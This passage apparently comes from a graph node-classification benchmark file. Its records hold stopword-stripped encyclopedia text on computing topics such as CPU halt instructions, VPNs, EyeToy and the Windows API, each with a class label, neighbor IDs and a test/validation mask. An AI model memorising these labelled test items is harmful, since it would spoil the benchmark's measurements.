interrupts normal operation could restored reset hence drop dead halt catch fire monikers references thus unresponsive behavior cpu state form erratic behavior mnemonic hcf believed first built-in self-test feature motorola microprocessor intel 8086 subsequent processors x86 series hlt halt instruction opcode f4 stopped instruction execution placed processor halt state enabled interrupt debug exception binit signal init signal reset signal resumed execution meant processor could always restarted early intel dx4 chips problem hlt instruction could restarted instruction used disabled computer turned hlt hcf instruction linux kernel added no-hlt option telling linux run infinite loop instead using hlt allowed users broken chips use linux 80286 undocumented opcode 0f 04 causing cpu hang executed way cpu reset implementations opcode emulated bios halting sequence many computers intel pentium line could locked executing invalid instruction f00f c7c8 caused computer lock became known pentium f00f bug compiler would create instruction malicious programmer could insert code render afflicted computer inoperable machine power-cycled since discovery workarounds developed prevent locking computer bug eliminated subsequent intel processors black hat usa 2017 christopher domas showed found new currently unknown halt catch fire instruction particular x86 processor model using x86 processor fuzzer called sandsifter affected instruction processor manufacturer yet revealed due responsible disclosure guidelines mos technology 6502 12 invalid instructions freeze cpu zilog z80 executing di disable interrupts followed halt wait interrupt results cpu staying frozen indefinitely waiting interrupt happen similar processor found game boy lr35902 contained partial fix allowing recover one halt would become frozen three consecutive halts interrupts disabled lr35902 contains less 11 opcodes fully lock cpu executed also noted z80 supports non-maskable interrupt /nmi signal pin 17 original 40 pin dip package since non-maskable interrupt regain control cpu even executing instruction sequence di halt pair represent true hcf result hcf condition either /nmi pin connected directly +5v rail making generation signal impossible interrupt routine services /nmi ends return placing back halt state apocryphal stories connect term illegal opcode ibm system/360 processor upon encountering instruction would start switching bus lines fast potentially leading overheating",
    "neighbors": [
      518,
      2571,
      8715,
      9739,
      5520,
      3474,
      8852,
      663,
      6167,
      8861,
      1694,
      1915,
      6319,
      11444,
      9919,
      8773,
      2383,
      5457,
      2262,
      477,
      10333,
      2399,
      2275,
      6501,
      2409,
      1515,
      1776,
      7281,
      7795,
      372,
      3323,
      7421
    ],
    "mask": "Test"
  },
  {
    "node_id": 5745,
    "label": 1,
    "text": "Index_locking:index locking databases index data structure part database used database system efficiently navigate access user data index data system data distinct user data consist primarily pointers changes database insert delete modify operations may require indexes updated maintain accurate user data accesses index locking technique used maintain index integrity portion index locked database transaction portion accessed transaction result attempt access related user data additionally special database system transactions user-invoked transactions may invoked maintain modify index part system self-maintenance activities portion index locked transaction transactions may blocked accessing index portion blocked modifying even reading depending lock type needed operation index locking protocol guarantees phantom phenomenon wo n't occur index locking protocol states specialized concurrency control techniques exist accessing indexes techniques depend index type take advantage structure typically much effective applying indexes common concurrency control methods applied user data notable widely researched specialized techniques b-trees b-tree concurrency control regularly used database indexes index locks used coordinate threads accessing indexes concurrently typically shorter-lived common transaction locks user data professional literature often called latches",
    "neighbors": [
      2456,
      5441,
      2901,
      7446
    ],
    "mask": "Test"
  },
  {
    "node_id": 5746,
    "label": 3,
    "text": "EyeToy:eyetoy eyetoy color webcam use playstation 2 supported games use computer vision gesture recognition process images taken eyetoy allows players interact games using motion color detection also sound built-in microphone released october 2003 camera manufactured logitech known logicool japan although newer eyetoys manufactured namtai camera mainly used playing eyetoy games developed sony companies intended use normal pc camera although programmers written unofficial drivers eyetoy compatible playstation 3 used video chatting november 6 2008 eyetoy sold 10.5 million units worldwide eyetoy conceived richard marks 1999 witnessing demonstration playstation 2 1999 game developers conference san jose california marks idea enable natural user interface mixed reality video game applications using inexpensive webcam using computational power playstation 2 implement computer vision gesture recognition technologies joined sony computer entertainment america scea year worked technology special projects manager research development marks work drew attention phil harrison vice president third party relations research development scea soon promoted senior vice president product development sony computer entertainment europe scee 2000 harrison brought marks division headquarters london demonstrate technology number developers demonstration marks joined ron festejo sce camden studio would later merge become sce london studio begin developing software title using technology would later become originally called itoy short interactive toy london branch webcam later renamed eyetoy harrison first demonstrated public playstation experience event august 2002 four minigames already planned release europe eyetoy picked sce japanese american branches successful showing playstation experience 2003 eyetoy released bundle eyetoy play europe july 4 north america november 4 end year eyetoy sold 2 million units europe 400,000 units united states february 11 2004 eyetoy released japan camera mounted pivot allowing positioning focusing camera performed rotating ring around lens comes two led lights front blue light turns ps2 indicating ready used red light flashes insufficient light room also microphone built second newer model eyetoy provides similar features sports smaller size silver casing since eyetoy essentially webcam inside casing designed match playstation 2 uses usb 1.1 protocol usb plug possible make work systems relatively easily drivers created make work many computer operating systems however linux os drivers installed yet official drivers offered namtai logitech sony microsoft windows mac os linux type driver required depends model eyetoy camera three different models model information included label bottom camera custom drivers red led normally signals inadequate lighting used active recording indicator blue led lit eyetoy plugged computer 25 games require eyetoy played 2 korean-exclusive ones released pal regions 8 2 third party titles released north america games may used eyetoy optionally typically enhanced eyetoy eyetoy enhanced label box eyetoy cameo system allowing players include images avatars games games support feature include head scanning program used generate 3d model player head stored memory card file available games support cameo feature eyetoy cameo licenses head creation technology digimask",
    "neighbors": [
      643,
      9091,
      3077,
      11398,
      10761,
      6797,
      6799,
      5269,
      9508,
      6311,
      9512,
      5291,
      684,
      306,
      1587,
      10931,
      1974,
      823,
      1091,
      4675,
      9543,
      10056,
      6732,
      10316,
      6738,
      9812,
      6873,
      859,
      4060,
      607,
      359,
      8937,
      3824,
      7028,
      7801,
      8316,
      6781
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5747,
    "label": 9,
    "text": "Basic_For_Qt:basic qt basic qt successor kbasic object-oriented framework related vb.net visual basic well integrated development environment designed run multiple platforms pre-compiled binaries available mac windows gnu/linux distributions source code also available",
    "neighbors": [
      3969,
      3718,
      6154,
      7691,
      1805,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      3233,
      546,
      11683,
      5925,
      8101,
      4136,
      10666,
      8494,
      303,
      2864,
      7343,
      7983,
      11315,
      823,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      6338,
      8262,
      10750,
      712,
      1101,
      8909,
      847,
      8147,
      1879,
      10971,
      92,
      11229,
      2915,
      9188,
      5733,
      10851,
      9320,
      11243,
      2541,
      8429,
      10478,
      759,
      6778,
      2045,
      6910,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 5748,
    "label": 3,
    "text": "Wait_(system_call):wait system call computer operating systems process task may wait another process complete execution systems parent process create independently executing child process parent process may issue wait system call suspends execution parent process child executes child process terminates returns exit status operating system returned waiting parent process parent process resumes execution modern operating systems also provide system calls allow process thread create threads wait terminate join similar fashion operating system may provide variations wait call allow process wait child processes exit wait single specific child process identified process id exit operating systems issue signal sigchld parent process child process terminates notifying parent process allowing retrieve child process exit status exit status returned child process typically indicates whether process terminated normally abnormally normal termination status also includes exit code usually integer value process returned system first 20 years unix low 8 bits exit code available waiting parent 1989 svr4 new call waitid introduced returns bits exit call structure called siginfo_t structure member si_status waitid mandatory part posix standard since 2001 child process terminates becomes zombie process continues exist entry system process table even though longer actively executing program normal operation typically immediately waited parent reaped system reclaiming resource process table entry child waited parent continues consume resource indefinitely thus resource leak situations typically handled special reaper process locates zombies retrieves exit status allowing operating system deallocate resources conversely child process whose parent process terminates becomes orphan process situations typically handled special root init process assigned new parent process parent process exits special process detects orphan process terminates retrieves exit status allowing system deallocate terminated child process child process receives signal waiting parent continue execution leaving orphan process behind hence sometimes needed check argument set wait waitpid waitid case wifsignaled true wait child process deallocate resources",
    "neighbors": [
      4423,
      2253,
      7983,
      2995,
      9919
    ],
    "mask": "Test"
  },
  {
    "node_id": 5749,
    "label": 4,
    "text": "Virtual_private_network:virtual private network virtual private network vpn extends private network across public network enables users send receive data across shared public networks computing devices directly connected private network applications running computing device e.g laptop desktop smartphone across vpn may therefore benefit functionality security management private network encryption common though inherent part vpn connection vpn technology developed allow remote users branch offices access corporate applications resources ensure security private network connection established using encrypted layered tunneling protocol vpn users use authentication methods including passwords certificates gain access vpn applications internet users may secure connections vpn circumvent geo-restrictions censorship connect proxy servers protect personal identity location stay anonymous internet however websites block access known vpn technology prevent circumvention geo-restrictions many vpn providers developing strategies get around roadblocks vpn created establishing virtual point-to-point connection use dedicated circuits tunneling protocols existing networks vpn available public internet provide benefits wide area network wan user perspective resources available within private network accessed remotely early data networks allowed vpn-style connections remote sites dial-up modem leased line connections utilizing x.25 frame relay asynchronous transfer mode atm virtual circuits provided networks owned operated telecommunication carriers networks considered true vpns passively secure data transmitted creation logical data streams replaced vpns based ip ip/multi-protocol label switching mpls networks due significant cost-reductions increased bandwidth provided new technologies digital subscriber line dsl fiber-optic networks vpns characterized host-to-network remote access connecting single computer network site-to-site connecting two networks corporate setting remote-access vpns allow employees access company intranet outside office site-to-site vpns allow collaborators geographically disparate offices share virtual network vpn also used interconnect two similar networks dissimilar intermediate network example two ipv6 networks ipv4 network vpn systems may classified vpns make online connections completely anonymous usually increase privacy security prevent disclosure private information vpns typically allow authenticated remote access using tunneling protocols encryption techniques vpn security model provides secure vpn protocols include following tunnel endpoints must authenticated secure vpn tunnels established user-created remote-access vpns may use passwords biometrics two-factor authentication cryptographic methods network-to-network tunnels often use passwords digital certificates permanently store key allow tunnel establish automatically without intervention administrator tunneling protocols operate point-to-point network topology would theoretically considered vpn vpn definition expected support arbitrary changing sets network nodes since router implementations support software-defined tunnel interface customer-provisioned vpns often simply defined tunnels running conventional routing protocols depending whether provider-provisioned vpn ppvpn operates layer 2 layer 3 building blocks described may l2 l3 combine multi-protocol label switching mpls functionality blurs l2-l3 identity device within customer network directly connected service provider network c devices aware vpn device edge customer network provides access ppvpn sometimes demarcation point provider customer responsibility providers allow customers configure pe device set devices edge provider network connects customer networks ce devices presents provider view customer site pes aware vpns connect maintain vpn state p device operates inside provider core network directly interface customer endpoint might example provide routing many provider-operated tunnels belong different customers ppvpns p device key part implementing ppvpns vpn-aware maintain vpn state principal role allowing service provider scale ppvpn offerings example acting aggregation point multiple pes p-to-p connections role often high-capacity optical links major locations providers virtual lan vlan layer 2 technique allow coexistence multiple local area network lan broadcast domains interconnected via trunks using ieee 802.1q trunking protocol trunking protocols used become obsolete including inter-switch link isl ieee 802.10 originally security protocol subset introduced trunking atm lan emulation lane developed institute electrical electronics engineers virtual lans vlans allow multiple tagged lans share common trunking vlans frequently comprise customer-owned facilities whereas vpls described section osi layer 1 services supports emulation point-to-point point-to-multipoint topologies method discussed extends layer 2 technologies 802.1d 802.1q lan trunking run transports metro ethernet used context vpls layer 2 ppvpn emulating full functionality traditional lan user standpoint vpls makes possible interconnect several lan segments packet-switched optical provider core core transparent user making remote lan segments behave one single lan vpls provider network emulates learning bridge optionally may include vlan service pw similar vpls provide different l2 protocols ends typically interface wan protocol asynchronous transfer mode frame relay contrast aiming provide appearance lan contiguous two locations virtual private lan service ipls would appropriate etherip ethernet ip tunneling protocol specification etherip packet encapsulation mechanism confidentiality message integrity protection etherip introduced freebsd network stack softether vpn server program subset vpls ce devices must layer 3 capabilities ipls presents packets rather frames may support ipv4 ipv6 section discusses main architectures ppvpns one pe disambiguates duplicate addresses single routing instance virtual router pe contains virtual router instance per vpn former approach variants gained attention one challenges ppvpns involves different customers using address space especially ipv4 private address space provider must able disambiguate overlapping addresses multiple customers ppvpns method defined bgp extensions advertise routes ipv4 vpn address family form 12-byte strings beginning 8-byte route distinguisher rd ending 4-byte ipv4 address rds disambiguate otherwise duplicate addresses pe pes understand topology vpn interconnected mpls tunnels either directly via p routers mpls terminology p routers label switch routers without awareness vpns virtual router architecture opposed bgp/mpls techniques requires modification existing routing protocols bgp provisioning logically independent routing domains customer operating vpn completely responsible address space various mpls tunnels different ppvpns disambiguated label need routing distinguishers virtual networks use tunneling protocols without encryption protecting privacy data vpns often provide security unencrypted overlay network neatly fit within secure trusted categorization example tunnel set two hosts generic routing encapsulation gre virtual private network neither secure trusted native plaintext tunneling protocols include layer 2 tunneling protocol l2tp set without ipsec point-to-point tunneling protocol pptp microsoft point-to-point encryption mppe trusted vpns use cryptographic tunneling instead rely security single provider network protect traffic security standpoint vpns either trust underlying delivery network must enforce security mechanisms vpn unless trusted delivery network runs among physically secure sites trusted secure models need authentication mechanism users gain access vpn users utilize mobile virtual private networks settings endpoint vpn fixed single ip address instead roams across various networks data networks cellular carriers multiple wi-fi access points without dropping secure vpn session losing application sessions mobile vpns widely used public safety give law-enforcement officers access applications computer-assisted dispatch criminal databases organizations similar requirements field service management healthcare increasing use vpns many started deploying vpn connectivity routers additional security encryption data transmission using various cryptographic techniques home users usually deploy vpns routers protect devices smart tvs gaming consoles supported native vpn clients supported devices restricted capable running vpn client many router manufacturers supply routers built-in vpn clients use open-source firmware dd-wrt openwrt tomato order support additional protocols openvpn setting vpn services router requires deep knowledge network security careful installation minor misconfiguration vpn connections leave network vulnerable performance vary depending internet service provider isp limitation traditional vpns point-to-point connections tend support broadcast domains therefore communication software networking based layer 2 broadcast packets netbios used windows networking may fully supported local area network variants vpn virtual private lan service vpls layer 2 tunneling protocols designed overcome limitation users must consider transmitted content encrypted entering vpn data visible receiving endpoint usually public vpn provider site regardless whether vpn tunnel wrapper encrypted inter-node transport secure vpn participants oversight ends entire data path content encrypted enters tunnel provider unapproved vpns reportedly illegal china used circumvent great firewall enforcement however might comprehensive",
    "neighbors": [
      2050,
      4100,
      14,
      5135,
      9233,
      8211,
      2082,
      2083,
      9764,
      9766,
      3625,
      1580,
      3629,
      5179,
      6719,
      9281,
      7238,
      8265,
      7761,
      1623,
      2136,
      601,
      6232,
      8283,
      1628,
      3676,
      4194,
      10850,
      10340,
      2661,
      9318,
      10341,
      10858,
      624,
      7794,
      9332,
      4725,
      3711,
      4224,
      4229,
      5254,
      10889,
      138,
      651,
      1164,
      4746,
      8331,
      9868,
      4240,
      1169,
      3732,
      1686,
      11418,
      1692,
      3742,
      10405,
      4268,
      10924,
      10417,
      7859,
      2228,
      10935,
      1208,
      3770,
      3777,
      10433,
      708,
      3781,
      7364,
      8391,
      6344,
      11468,
      6351,
      3792,
      7376,
      7887,
      7893,
      3286,
      728,
      1242,
      6364,
      7390,
      9440,
      3299,
      5860,
      3813,
      9451,
      8432,
      9970,
      245,
      5877,
      3322,
      251,
      8956,
      5373,
      5887,
      2818,
      5892,
      5899,
      9485,
      5391,
      1297,
      1810,
      8980,
      10522,
      813,
      3885,
      3382,
      5433,
      829,
      11073,
      2884,
      5959,
      328,
      10058,
      9035,
      4429,
      6991,
      11088,
      3409,
      6993,
      4435,
      8022,
      11606,
      9048,
      11097,
      6490,
      5469,
      3422,
      5470,
      7523,
      3428,
      1893,
      3941,
      8039,
      9063,
      4457,
      5486,
      367,
      5491,
      1908,
      6516,
      7541,
      3959,
      6519,
      8054,
      3962,
      9080,
      2947,
      6531,
      10631,
      8584,
      1930,
      4490,
      5516,
      4504,
      3482,
      5531,
      11162,
      9117,
      6560,
      929,
      3495,
      8103,
      1456,
      10161,
      3507,
      8630,
      1978,
      11198,
      8640,
      7106,
      6602,
      9675,
      9682,
      11221,
      5084,
      5085,
      10207,
      1504,
      10210,
      7139,
      9193,
      11241,
      2539,
      11248,
      9713,
      10232,
      9722
    ],
    "mask": "Test"
  },
  {
    "node_id": 5750,
    "label": 7,
    "text": "Microsoft_Dynamics_365_for_Finance_and_Operations:microsoft dynamics 365 finance operations microsoft dynamics 365 finance operations enterprise edition microsoft enterprise resource planning erp system medium large organisations software part dynamics 365 product line first general release november 2016 initially branded dynamics 365 operations july 2017 rebranded dynamics 365 finance operations time microsoft rebranded business software suite small businesses business edition financials finance operations business edition however two applications based completely different platforms dynamics 365 finance operations available part unified operations plan also includes dynamics 365 talent dynamics 365 retail microsoft powerapps three options deployment",
    "neighbors": [
      11113,
      4194,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 5751,
    "label": 9,
    "text": "Kawa_(Scheme_implementation):kawa scheme implementation kawa language framework written programming language java implements programming language scheme dialect lisp used implement languages run java virtual machine jvm part gnu project name kawa comes polish word coffee play words since java another familiar name coffee besides using language scheme java object fields methods accessed using code invoke java method thing java object fields accessed static class methods invoked function kawa extended java code creating scheme functions java combined jvm implementations kawa run normally via codice_1 script kawa optional arguments ... alternatively kawa run hand java -jar /path/to/kawa/kawa.jar optional arguments ... compile scheme file class file parameter used java kawa.repl -- main -c file.scm produce codice_2 run typing codice_3 also possible create applet servlet compile servlet codice_4 must codice_5 variable",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      5677,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      7805,
      2691,
      1159,
      9865,
      9877,
      5803,
      2225,
      6840,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      5872,
      8435,
      9969,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      9050,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      5612,
      7670,
      11255
    ],
    "mask": "None"
  },
  {
    "node_id": 5752,
    "label": 4,
    "text": "Security_convergence:security convergence security convergence refers convergence two historically distinct security functions – physical security information security – within enterprises integral parts coherent risk management program security convergence motivated recognition corporate assets increasingly information-based whereas past physical assets demanded bulk protection efforts today information assets demand equal far attention convergence endorsed three leading international organizations security professionals – asis international isaca issa – together co-founded alliance enterprise security risk management part promote",
    "neighbors": [
      10717,
      5373
    ],
    "mask": "None"
  },
  {
    "node_id": 5753,
    "label": 3,
    "text": "The_Tower_of_Druaga:tower druaga druaga designed masanobu endo best known creating xevious 1983 inspired games wizardry dungeons dragons conceived fantasy pac-man combat puzzle solving taking inspiration sumerian mesopotamian babylonian mythology began prototype game called quest interlocking mazes revised run arcade system original concept scrapped due endo disliking heavy use role-playing elements instead becoming action-oriented game japan tower druaga widely successful attracting millions fans use secrets hidden items cited important game genre laying foundation future games well inspiring idea sharing tips friends guidebooks druaga noted influential many games follow including ys hydlide dragon slayer legend zelda dragon quest creator koichi nakamura citing endo favorite game developer north america game met negative reception obtuse design many said near-impossible finish without guidebook alongside high difficulty controls success game japan would inspire several ports multiple platforms well spawning massive franchise known babylonian castle saga including multiple sequels spin-offs literature anime series produced gonzo tower druaga action role-playing maze video game controlling knight gilgamesh player must scale 60 floors tower rescue maiden ki druaga four-armed demon plans use artifact called blue crystal rod enslave mankind gilgamesh need locate key floor order open door allowing proceed next floor floor different types enemies slimes knights projectile-firing wizards ghosts travel walls fire-spewing dragons gilgamesh defeat enemies hitting sword — require multiple hits defeat gilgamesh also block projectiles facing shield floor also hidden item uncovered completing tasks defeating certain number enemies inputting specific code joystick items include pickaxe destroy walls boots drastically increase gilgamesh walking speed candle reveal ghosts items required fully beat game failing either cause player die make game unwinnable time limit also present floor player take long two indestructible spherical enemies named will-o-wisps charge towards gilgamesh player forget get required item instead sent back zapped earlier floor retrieve game mazes randomized playthrough although treasure appear player starting point tower druaga designed masanobu endo joined namco april 1982 releasing xevious following year overwhelming success japan endo took business trip north america bought copy dungeons dragons intrigued gameplay setting endo fan apple ii game wizardry set make next game action role-playing title returning japan designed basic prototype game called quest player would able explore inter-locking rooms defeating enemies using keys open doors — expanded version made run namco super pac-man arcade system titled return ishtar upon completion endo dissatisfied game heavy use role-playing elements leading game instead becoming action-oriented game puzzle solving conceived fantasy pac-man second prototype endo took inspiration sumerian mesopotamian babylonian mythology including epic gilgamesh tower babel several characters named mesopotamian indian gods including antagonist druaga goddess ishtar game made run hardware setup used mappy featured horizontal-scrolling vertical screen layout 60 floors inspired sunshine 60 tallest building asia time music game composed junko ozawa promotional arcade flyer used miniature dioramas cardboard cutouts instead drawings response namco president masaya nakamura hatred towards manga last frame poster gilgamesh wearing horned helmet fighting druaga meant imply players would need order finish game tower druaga released arcades japan june 1984 druaga would ported several japanese game systems including msx 1984 family computer 1985 fujitsu fm-7 1985 portable game boy version released 1990 16-bit remake pc-engine 1992 — gb version re-released 1996 part compilation title namco gallery vol 2 also included galaxian dig dug famista 4 1997 windows port released part namco history vol 2 alongside several early namco arcade titles 2003 famicom version re-released japan gamecube pre-order bonus several japanese mobile phone ports released first 2002 java version followed i-mode release 2003 2009 digital version released wii virtual console one four launch titles then-new virtual console arcade service alongside mappy gaplus star force famicom version released onto 3ds virtual console december 2012 exclusive japan druaga would included several namco museum compilations including namco museum vol 3 1996 namco museum battle collection 2005 namco museum virtual arcade 2009 namco museum switch 2017 japan tower druaga overwhelming critical success attracting millions fans use puzzle-solving action-oriented gameplay cited important landmark role-playing genre helped lay foundations future titles druaga cited influential many japanese role-playing games including ys hydlide dragon slayer legend zelda koichi nakamura creator dragon quest since cited masanobu endo favorite video game developer druaga also helped inspire idea note sharing players tower druaga met negative reception north america many criticizing game controls high difficulty design reviewing wii virtual console port dan whitehead eurogamer referred game design diabolically obtuse criticized gilgamesh slow movement notably deflecting projectiles whitehead also criticized hidden treasures elusive appealing towards dedicated players although stated interesting gameplay idea brett alan weiss allgame also criticized hidden items especially required later levels well player wimpy attack time limit marcel van duyn nintendo life said recommended truly sadistic gamers expressing distaste towards repetitive levels high difficulty obtuse secrets lucas m. thomas ign critical game lambasting arbitrary wall item requirements slow pace high difficulty calling woefully boring pointless play also noted player would need walkthrough order fully beat 2003 interview endo stated somewhat regretted making game difficult noting might made players paranoid finding secrets games success tower druaga would spawn wave sequels spin-off games collectively known babylonian castle saga series first released 1986 return ishtar based original prototype druaga developed endo game company game studio published namco arcades taking place right events original two players controlled gilgamesh ki made way bottom druaga tower blue crystal rod 1996 ported playstation part namco museum vol 4 famicom prequel game quest ki released 1988 — controlling ki player make top druaga tower search blue crystal rod leading events first game super famicom follow-up released 1994 blue crystal rod also known destiny gilgamesh gameplay much different compared earlier games instead graphical adventure game characters series 1996 two altered versions original game another tower darkness tower included hidden extras namco museum vol 3 made much harder original game altered requirements finding treasure game boy color spin-off seme com dungeon drururuaga released 2000 2004 namco partnered arika develop playstation 2 one babylonian castle saga games localized outside japan part mystery dungeon series game notorious extreme difficulty death would revoke player items half money online-based arcade game released 2005 druaga online story aon followed similar pc game 2009 tower druaga recovery babylim spin-off game labyrinth druaga released japanese mobile phones january 12 2011 1990 namco produced theme park attraction based tower druaga expo '90 osaka alongside show conclusion moved namco wonder eggs amusement park tokyo 1992 remaining park closing december 31 2000 sugoroku medal game released arcades 2000 sugoroku adventure tower druaga also featured characters namco valkyrie series gilgamesh red-striped shield blue crystal rod appear sophita alternative weapons soul edge gamecube game features gamemode inspired game titled hole druaga mii fighter costume based gilgamesh released super smash bros. nintendo 3ds wii u 2015 anime reboot series tower druaga aegis uruk produced japanese studio gonzo premiering april 4 2008 taking place roughly 60 years events arcade game followed sequel series tower druaga sword uruk premiering january 8 2009",
    "neighbors": [
      3077,
      9093,
      3113,
      2540,
      9006,
      10287,
      1776,
      10931,
      4216,
      10234,
      6077,
      3039
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5754,
    "label": 2,
    "text": "Windows_API:windows api windows api informally winapi microsoft core set application programming interfaces apis available microsoft windows operating systems name windows api collectively refers several different platform implementations often referred names example win32 api see versions section almost windows programs interact windows api windows nt line operating systems small number programs started early windows startup process use native api developer support available form software development kit microsoft windows sdk providing documentation tools needed build software based windows api associated windows interfaces windows api win32 focused mainly programming language c exposed functions data structures described language recent versions documentation however api may used programming language compiler assembler able handle well-defined low-level data structures along prescribed calling conventions calls callbacks similarly internal implementation api function developed several languages historically despite fact c object-oriented programming language windows api windows historically described object-oriented also many wrapper classes extensions microsoft others object-oriented languages make object-oriented structure explicit microsoft foundation class library mfc visual component library vcl gdi+ etc. instance windows 8 provides windows api winrt api implemented c++ object-oriented design functions provided windows api grouped eight categories internet explorer ie web browser also exposes many apis often used applications could considered part windows api ie included operating system since windows 95 osr2 provided web-related services applications since windows 98 specifically used provide classic windows multimedia api placed winmm.dll contains functions play sound files send receive midi messages access joysticks facilitate features so-called mci subsystem windows originates multimedia extensions available windows 3.0 separately integral part operating system since windows 3.1 time located mmsystem.dll apart part every windows version since windows 95 osr2 microsoft provided directx apis—a loosely related set graphics gaming services includes microsoft also provides several apis media encoding playback windows api designed mostly interaction operating system application communication among different windows applications microsoft developed series technologies alongside main windows api started dynamic data exchange dde superseded object linking embedding ole later component object model com automation objects activex controls .net framework always clear distinction technologies much overlap variety terms basically result grouping software mechanisms relate given aspect software development automation specifically relates exporting function application component application programming interface api controlled applications instead human users .net self-contained general methodology technology develop desktop web applications written variety just-in-time jit compiled languages windows.pas pascal/delphi unit contains windows-specific api declarations pascal equivalent windows.h used c. various wrappers developed microsoft took low level functions windows api allowed applications interact api abstract manner microsoft foundation class library mfc wrapped windows api functionality c++ classes thus allows object-oriented way interact api active template library atl template oriented wrapper com windows template library wtl developed extension atl intended smaller alternative mfc application frameworks windows least partly wrap windows api thus .net framework java likewise programming languages windows contain wrapper libraries windows api code pack microsoft .net framework .net wrapper library windows api windows api always exposed large part underlying structure windows systems programmers advantage giving much flexibility power applications also creates great responsibility applications handle various low-level sometimes tedious operations associated graphical user interface example beginning c programmer often write simple hello world first assignment working part program single printf line within main subroutine overhead linking standard i/o library also one line windows version still one working line code required many many lines overhead charles petzold wrote several books programming windows api said original hello world program windows 1.0 sdk bit scandal hello.c 150 lines long hello.rc resource script another 20 lines ... veteran programmers often curled horror laughter encountering windows hello-world program years various changes additions made windows systems windows api changed grew reflect windows api windows 1.0 supported fewer 450 function calls whereas modern versions windows api support thousands however general interface remained fairly consistent old windows 1.0 application still look familiar programmer used modern windows api microsoft made effort maintain backward compatibility achieve developing new versions windows microsoft sometimes implemented workarounds allow compatibility third-party software used prior version undocumented even inadvisable way raymond chen microsoft developer works windows api said could probably write months solely bad things apps get work often spite get particularly furious people accuse microsoft maliciously breaking applications os upgrades application failed run windows 95 took personal failure one largest changes windows api transition win16 shipped windows 3.1 older win32 windows nt windows 95 win32 originally introduced windows nt 3.1 win32s allowed use win32 subset windows 95 windows 95 widespread porting applications win32 began ease transition windows 95 developers outside inside microsoft complex scheme api thunks used could allow 32-bit code call 16-bit code win16 apis vice versa flat thunks allowed 32-bit code call 16-bit libraries scheme used extensively inside windows 95 libraries avoid porting whole os win32 one batch windows nt os pure 32-bit except parts compatibility 16-bit applications generic thunks available thunk win16 win32 windows 95 platform sdk shipped compiler could produce code needed thunks versions 64-bit windows also able run 32-bit applications via wow64 syswow64 folder located windows folder os drive contains several tools support 32-bit applications almost every new version microsoft windows introduced additions changes windows api name api however remained consistent different windows versions name changes kept limited major architectural platform changes windows microsoft eventually changed name current win32 api family windows api made catch-all term past future api versions wine project provides win32 api compatibility layer unix-like platforms linux kernel api programs written windows api reactos goes step aims implement full windows operating system working closely wine project promote code re-use compatibility doswin32 hx dos extender projects emulate windows api allow executing simple windows programs dos command line odin project emulate win32 os/2 superseding original win-os/2 emulation based microsoft code minor implementations include mewel zinc libraries intended implement subset win16 api dos see list platform-independent gui libraries windows interface source environment wise licensing program microsoft allowed developers recompile run windows-based applications unix macintosh platforms wise sdks based emulator windows api could run platforms efforts toward standardization included sun public windows interface pwi win16 see also sun windows application binary interface wabi willows software application programming interface windows apiw win16 win32 see also willows twin ecma-234 attempted standardize windows api bindingly develop software uses windows api compiler must able use microsoft-specific dlls listed com-objects outside win32 assume certain vtable layout compiler must either handle header files expose interior api function names supply files language c++ zortech later symantec digital mars watcom borland produced well known commercial compilers used often win16 win32s win32 supplied memory extenders allowing win32 programs run win16 microsoft redistributable win32s dll zortech compiler probably one first stable usable c++ compilers windows programming microsoft c++ compiler certain classes applications compiler system also able handle interface description language idl files collectively prerequisites compilers tools libraries headers known microsoft platform sdk time microsoft visual studio borland integrated development system integrated development environments ides could provide although sdk downloadable free separately entire ide suite microsoft windows sdk windows 7 .net framework 4 mingw cygwin projects also provide environment based gnu compiler collection gcc using stand-alone header file set make linking win32-specific dlls simple lcc-win32 c compiler maintained jacob navia freeware non-commercial use pelles c freeware c compiler maintained pelle orinius free pascal free software object pascal compiler supports windows api masm32 package mature project providing support windows api microsoft macro assembler masm using custom made converted headers libraries platform sdk flat assembler fasm allows building windows programs without using external linker even running linux windows specific compiler support also needed structured exception handling seh system serves two purposes provides substrate language-specific exception handling implemented kernel notifies applications exceptional conditions dereferencing invalid pointer stack overflow microsoft/borland c++ compilers ability use system soon introduced windows 95 nt however actual implementation undocumented reverse engineered wine project free compilers seh based pushing exception handler frames onto stack adding linked list stored thread local storage first field thread environment block exception thrown kernel base libraries unwind stack running handlers filters encountered eventually every exception unhandled application dealt default backstop handler pops windows common crash dialog",
    "neighbors": [
      10243,
      11269,
      2062,
      10769,
      1043,
      4627,
      9245,
      3102,
      1055,
      5663,
      9762,
      2083,
      6180,
      8227,
      1577,
      2603,
      5165,
      5677,
      3631,
      4143,
      7728,
      4658,
      9263,
      11316,
      1077,
      6709,
      8246,
      7739,
      6207,
      576,
      8771,
      582,
      8262,
      585,
      3659,
      4173,
      4174,
      4178,
      83,
      9813,
      10839,
      10841,
      2138,
      603,
      6751,
      608,
      1632,
      2145,
      2658,
      5743,
      8303,
      2673,
      8304,
      9839,
      1656,
      6265,
      9848,
      8315,
      7292,
      9340,
      639,
      1664,
      5761,
      1666,
      5765,
      10886,
      2183,
      651,
      1676,
      653,
      5259,
      6797,
      10388,
      10900,
      3734,
      10902,
      3224,
      11414,
      3235,
      4771,
      7846,
      4777,
      10414,
      11442,
      692,
      8391,
      200,
      214,
      4822,
      6358,
      9943,
      9434,
      9946,
      2783,
      736,
      4321,
      6370,
      9441,
      4836,
      10465,
      10470,
      3303,
      1770,
      11498,
      5356,
      3821,
      10991,
